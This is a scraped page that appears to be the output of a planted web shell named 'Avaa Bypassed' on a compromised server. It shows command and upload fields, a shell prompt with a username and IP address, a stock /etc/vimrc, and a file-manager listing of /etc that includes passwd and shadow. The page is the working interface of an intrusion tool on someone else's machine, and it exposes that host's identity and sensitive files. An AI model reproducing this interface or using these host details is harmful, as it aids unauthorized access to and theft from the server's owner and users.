404

[ Avaa Bypassed ]




Upload:

Command:

elspacio@3.133.136.117: ~ $
if v:lang =~ "utf8$" || v:lang =~ "UTF-8$"
   set fileencodings=ucs-bom,utf-8,latin1
endif

set nocompatible	" Use Vim defaults (much better!)
set bs=indent,eol,start		" allow backspacing over everything in insert mode
"set ai			" always set autoindenting on
"set backup		" keep a backup file
set viminfo='20,\"50	" read/write a .viminfo file, don't store more
			" than 50 lines of registers
set history=50		" keep 50 lines of command line history
set ruler		" show the cursor position all the time

" Only do this part when compiled with support for autocommands
if has("autocmd")
  augroup redhat
  autocmd!
  " In text files, always limit the width of text to 78 characters
  " autocmd BufRead *.txt set tw=78
  " When editing a file, always jump to the last cursor position
  autocmd BufReadPost *
  \ if line("'\"") > 0 && line ("'\"") <= line("$") |
  \   exe "normal! g'\"" |
  \ endif
  " don't write swapfile on most commonly used directories for NFS mounts or USB sticks
  autocmd BufNewFile,BufReadPre /media/*,/run/media/*,/mnt/* set directory=~/tmp,/var/tmp,/tmp
  " start with spec file template
  autocmd BufNewFile *.spec 0r /usr/share/vim/vimfiles/template.spec
  augroup END
endif

if has("cscope") && filereadable("/usr/bin/cscope")
   set csprg=/usr/bin/cscope
   set csto=0
   set cst
   set nocsverb
   " add any database in current directory
   if filereadable("cscope.out")
      cs add $PWD/cscope.out
   " else add database pointed to by environment
   elseif $CSCOPE_DB != ""
      cs add $CSCOPE_DB
   endif
   set csverb
endif

" Switch syntax highlighting on, when the terminal has colors
" Also switch on highlighting the last used search pattern.
if &t_Co > 2 || has("gui_running")
  syntax on
  set hlsearch
endif

filetype plugin on

if &term=="xterm"
     set t_Co=8
     set t_Sb=[4%dm
     set t_Sf=[3%dm
endif

" Don't wake up system with blinking cursor:
" http://www.linuxpowertop.org/known.php
let &guicursor = &guicursor . ",a:blinkon0"

Filemanager

Name Type Size Permission Actions
alternatives Folder 0755
apache2 Folder 0755
bash_completion.d Folder 0755
cl.nodejs Folder 0755
cl.php.d Folder 0755
cl.python Folder 0755
cl.selector Folder 0755
cl.selector.conf.d Folder 0755
cpanel Folder 0751
crypto-policies Folder 0755
default Folder 0755
environment-modules Folder 0755
fonts Folder 0755
gcrypt Folder 0755
imunify360 Folder 0755
ld.so.conf.d Folder 0755
mail Folder 0755
modulefiles Folder 0755
motd.d Folder 0755
my.cnf.d Folder 0755
openldap Folder 0755
pam.d Folder 0755
pki Folder 0755
profile.d Folder 0755
sasl2 Folder 0755
scl Folder 0755
security Folder 0755
skel Folder 0755
snmp Folder 0755
ssh Folder 0755
ssl Folder 0755
sysconfig Folder 0755
.etc.version File 5 B 0600
DIR_COLORS File 4.43 KB 0644
aliases File 1.49 KB 0644
at.deny File 1 B 0644
backupmxhosts File 0 B 0640
bashrc File 3.67 KB 0644
domainusers File 21.99 KB 0640
environment File 0 B 0644
group File 511 B 0644
host.conf File 9 B 0644
hosts File 9.83 KB 0644
inputrc File 942 B 0644
ld.so.cache File 36.03 KB 0644
ld.so.conf File 28 B 0644
localtime File 299 B 0644
mail.rc File 1.92 KB 0644
mailcap File 272 B 0644
mailhelo File 106.08 KB 0640
mailips File 86.17 KB 0640
mime.types File 58.94 KB 0644
my.cnf File 1.97 KB 0644
nsswitch.conf File 2.07 KB 0644
passwd File 1.32 KB 0644
profile File 2.86 KB 0644
protocols File 6.41 KB 0644
File 0 B 0
resolv.conf File 90 B 0644
rpc File 1.6 KB 0644
screenrc File 6.56 KB 0644
senderverifybypasshosts File 0 B 0640
services File 676.03 KB 0644
shadow File 862 B 0600
skipsmtpcheckhosts File 0 B 0640
spammeripblocks File 0 B 0640
trusted-key.key File 375 B 0644
trustedmailhosts File 0 B 0640
vimrc File 1.94 KB 0644
virc File 1.18 KB 0644
wgetrc File 4.81 KB 0644